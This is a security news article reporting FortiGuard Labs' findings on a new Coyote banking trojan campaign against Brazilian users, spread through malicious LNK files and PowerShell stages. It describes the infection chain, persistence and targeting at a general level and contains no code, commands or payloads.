FortiGuard Labs has discovered a sophisticated new attack chain involving malicious Windows Shortcut (LNK) files designed to deploy the notorious Coyote banking malware. The trojan primarily targets users in Brazil, specifically aiming to steal sensitive data from over 70 financial applications and a variety of websites.
The files contain PowerShell commands and initiate a series of operations that ultimately lead to the installation of the trojan on victim systems.
Coyote is capable of executing a range of malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal user credentials.
FortiGuard Labs says that, over the past month, it has uncovered several instances of LNK file artifacts containing embedded PowerShell commands that fetch subsequent malicious payloads from remote servers, starting a multi-stage infection process.
Coyote was initially documented in early 2024 and has since been linked to targeted attacks against Brazilian users. In addition to financial applications, the malware now also targets a broader range of websites, including those related to e-commerce and tourism.
In the latest observed infection sequence, an LNK file executes a PowerShell script that retrieves another PowerShell script from a remote server. The injected code leverages Donut, a tool designed to decrypt and execute the final MSIL (Microsoft Intermediate Language) payloads. The payloads then establish persistence on the infected machine by modifying the Windows registry, ensuring the malware remains active even after a system reboot.
The malware's persistence mechanism involves creating a new registry entry with a random name that points to a PowerShell command. This command fetches and executes a Base64-encoded URL, facilitating the execution of the Coyote banking trojan's main functions. Once activated, the trojan collects basic system information and a list of installed antivirus products before exfiltrating the data to a remote server. It also uses various evasion techniques to avoid detection by security measures such as sandboxes and virtual environments.
A significant development in this new variant of Coyote is the expansion of its target list, which now includes 1,030 websites and 73 financial institutions. When a victim attempts to access any of the sites, Coyote can trigger a variety of malicious actions, from capturing screenshots to serving phishing overlays. Additionally, the malware can activate a keylogger and alter display settings to further deceive the victim.
“Coyote's infection process is complex and multi-staged. This attack leveraged an LNK file for initial access, which subsequently led to the discovery of other malicious files. This Trojan poses a significant threat to financial cybersecurity, particularly because it has the potential to expand beyond its initial targets,” the researchers warned.
